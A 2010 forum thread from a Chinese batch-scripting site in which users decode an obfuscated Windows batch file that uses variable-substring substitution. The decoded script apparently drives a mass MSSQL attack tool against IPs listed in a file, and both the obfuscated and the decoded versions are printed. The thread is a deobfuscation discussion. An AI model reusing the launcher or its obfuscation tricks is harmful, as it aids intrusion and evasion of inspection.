标题: [其他] [已解决]变量替换类型的加密批处理如何解密? [打印本页]
作者: xswy 时间: 2010-8-2 17:35 标题: [已解决]变量替换类型的加密批处理如何解密?
cls
@echo o%programfiles:~-5,1%%programfiles:~-5,1%
set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
%%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a
cls
%tcopu:~32,1%echo off
setlocal
MODE con: COLS=%tcopu:~12,1%%tcopu:~29,1% lines=%comspec:~-9,1%%tcopu:~17,1%
color %tcopu:~14,1%e
set Recycled=
i%Recycled%f no%Recycled%t e%Recycled%xist C:\W%Recycled%indows\Con%Recycled%fig\NoH%Recycled%ack.z%Recycled%ip g%Recycled%oto N%Recycled%o
for %%%tcopu:~21,1% in %tcopu:~25,1%"C:\Wi%Recycled%ndows\Confi%Recycled%g\N%Recycled%oHack.zi%Recycled%p"%tcopu:~30,1% do if %%~z%tcopu:~21,1% E%Recycled%QU %tcopu:~16,1%%Recycled%%comspec:~-9,1%%Recycled%%tcopu:~23,1% go%Recycled%to Ye%Recycled%s
%tcopu:~32,1%del C:\Wind%Recycled%ows\Co%Recycled%nfig\No%Recycled%Hack.zi%Recycled%p
exit
:Yes
FOR /F "eol=; tokens=%tcopu:~21,1%,%comspec:~-9,1% delims= " %%i in %tcopu:~25,1%AllIp.txt%tcopu:~30,1% do %tcopu:~32,1%e%Recycled%cho ec%Recycled%ho %%i %%j ^>^>I%Recycled%p.txt>%%i.bat© %%i.bat+Auto%Recycled%Sql %%j.wmi&del %%i.bat
copy *.wmi MsSql.bat&del *.wmi
c%Recycled%all Ms%Recycled%Sql.b%Recycled%at
go%Recycled%to Y%Recycled%es
:N%Recycled%o
e%Recycled%xit
这里的代码如何解密?
其中的用 echo 可以解一部分
%tcopu:~32,1% 这种的不知道如何解?
谢谢。
不求结果 只想知道解密方法过程~呵呵~
[ 本帖最后由 xswy 于 2010-8-3 12:54 编辑 ]
作者: xswy 时间: 2010-8-3 08:26
阅览次数 39 回复帖数 0 郁闷了~~
作者: xswy 时间: 2010-8-3 08:36
set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
%tcopu:~32,1% 这个该如何算?
作者: xswy 时间: 2010-8-3 09:30
从右往左数第32个字符 ???
%算做什么?
作者: xswy 时间: 2010-8-3 09:44
晕了 我自问自答了。。已经快解完了 只剩下 %tcopu:~32,1% 这样的了
set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
%tcopu:~32,1%
从右往左数第32个字符 ???
%算做什么?
作者: broly 时间: 2010-8-3 10:47
是@。。。这个猜都可以。。。
另外,你想知道是什么的话,可以在这句命令的上一句添加echo %tcopu:~32,1% &pause
这样你就可以知道了
作者: xswy 时间: 2010-8-3 11:20
% 为何表示 @ 有字符编码吗?能否发全部?
作者: xswy 时间: 2010-8-3 11:28
原帖由 broly 于 2010-8-3 10:47 发表
是@。。。这个猜都可以。。。
另外,你想知道是什么的话,可以在这句命令的上一句添加echo %tcopu:~32,1% &pause
这样你就可以知道了
谢谢您的回复。
我菜鸟 呵呵。
只能在这里求助。
有点不明白。
你说 %%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%% 从左到右数第32个字符 %
%=@
这个我在CMD 下 如何写 echo 命令 ?
echo %%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%:~32,1% &pause
貌似不对啊?
作者: xswy 时间: 2010-8-3 11:51
if "%x:~0,1%"=="%%" set "result=%result%%x:~0,1%"&set "x=%x:~1%"&set term=1&goto next
if "%x:~0,1%"==" " set "result=%result% "&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="a" set "result=%result%%%appdata:~-1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="b" set "result=%result%%%tcopu:~1,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="c" set "result=%result%%%userprofile:~5,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="d" set "result=%result%%%appdata:~15,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="e" set "result=%result%%%comspec:~-1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="f" set "result=%result%%%tcopu:~11,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="g" set "result=%result%%%programfiles:~6,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="h" set "result=%result%%%tcopu:~2,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="i" set "result=%result%%%programfiles:~-4,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="j" set "result=%result%%%tcopu:~4,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="k" set "result=%result%%%tcopu:~5,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="l" set "result=%result%%%appdata:~-13,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="m" set "result=%result%%%appdata:~7,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="n" set "result=%result%%%userprofile:~14,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="o" set "result=%result%%%appdata:~-7,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="p" set "result=%result%%%appdata:~-15,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="q" set "result=%result%%%tcopu:~6,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="r" set "result=%result%%%programfiles:~4,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="s" set "result=%result%%%comspec:~-16,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="t" set "result=%result%%%comspec:~-13,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="u" set "result=%result%%%userprofile:~6,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="v" set "result=%result%%%tcopu:~8,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="w" set "result=%result%%%os:~5,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="x" set "result=%result%%%comspec:~-2,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="y" set "result=%result%%%comspec:~12,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="z" set "result=%result%%%tcopu:~9,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="0" set "result=%result%%%tcopu:~17,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="1" set "result=%result%%%tcopu:~21,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="2" set "result=%result%%%comspec:~-9,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="3" set "result=%result%%%comspec:~-10,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="4" set "result=%result%%%tcopu:~14,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="5" set "result=%result%%%tcopu:~16,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="6" set "result=%result%%%tcopu:~33,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="7" set "result=%result%%%tcopu:~12,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="8" set "result=%result%%%tcopu:~23,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="9" set "result=%result%%%tcopu:~29,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="(" set "result=%result%%%tcopu:~25,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"==")" set "result=%result%%%tcopu:~30,1%%"&set "x=%x:~1%"&goto next
if "%x:~0,1%"=="@" set "result=%result%%%tcopu:~32,1%%"&set "x=%x:~1%"&goto next
作者: broly 时间: 2010-8-3 12:17 标题: 回复 8楼 的帖子
不是在CMD下执行命令,是在批处理内执行,如:- cls
- @echo o%programfiles:~-5,1%%programfiles:~-5,1%
- set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
- %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a
- cls
- echo %tcopu:~32,1%&pause
- %tcopu:~32,1%echo off
- setlocal
- MODE con: COLS=%tcopu:~12,1%%tcopu:~29,1% lines=%comspec:~-9,1%%tcopu:~17,1%
- color %tcopu:~14,1%e
- set Recycled=
- i%Recycled%f no%Recycled%t e%Recycled%xist C:\W%Recycled%indows\Con%Recycled%fig\NoH%Recycled%ack.z%Recycled%ip g%Recycled%oto N%Recycled%o
- for %%%tcopu:~21,1% in %tcopu:~25,1%"C:\Wi%Recycled%ndows\Confi%Recycled%g\N%Recycled%oHack.zi%Recycled%p"%tcopu:~30,1% do if %%~z%tcopu:~21,1% E%Recycled%QU %tcopu:~16,1%%Recycled%%comspec:~-9,1%%Recycled%%tcopu:~23,1% go%Recycled%to Ye%Recycled%s
- %tcopu:~32,1%del C:\Wind%Recycled%ows\Co%Recycled%nfig\No%Recycled%Hack.zi%Recycled%p
- exit
- :Yes
- FOR /F "eol=; tokens=%tcopu:~21,1%,%comspec:~-9,1% delims= " %%i in %tcopu:~25,1%AllIp.txt%tcopu:~30,1% do %tcopu:~32,1%e%Recycled%cho ec%Recycled%ho %%i %%j ^>^>I%Recycled%p.txt>%%i.bat© %%i.bat+Auto%Recycled%Sql %%j.wmi&del %%i.bat
- copy *.wmi MsSql.bat&del *.wmi
- c%Recycled%all Ms%Recycled%Sql.b%Recycled%at
- go%Recycled%to Y%Recycled%es
- :N%Recycled%o
- e%Recycled%xit
复制代码
作者: xswy 时间: 2010-8-3 12:43
谢谢~~已经搞定了~
作者: broly 时间: 2010-8-3 12:45
我解的密:-
- cls
- @echo off
- set tcopu=%%bh%%jkq%%vz%%f7%%4c50t%%u1w8%%(cdf9)%%@6tc%%
- %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %
- %a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a
- %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %
- %a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a %%a
- %%a %%a %%a
- cls
- @echo off
- setlocal
- MODE con: COLS=79 lines=20
- color 4e
- set Recycled=
- if not exist C:\Windows\Config\NoHack.zip goto No
- for %%1 in ("C:\Windows\Config\NoHack.zip") do if %%~z1 EQU 528 goto Yes
- @del C:\Windows\Config\NoHack.zip
- exit
- :Yes
- FOR /F "eol=; tokens=1,2 delims= " %%i in (AllIp.txt) do @echo echo %%i %%j ^>^>Ip.txt>%%i.bat© %%i.bat+AutoSql %%j.wmi&del %%i.bat
- copy *.wmi MsSql.bat&del *.wmi
- call MsSql.bat
- goto Yes
- :No
- exit
复制代码
[ 本帖最后由 broly 于 2010-8-3 12:46 编辑 ]
欢迎光临 批处理之家 (http://www.bathome.net/) |
Powered by Discuz! 7.2 |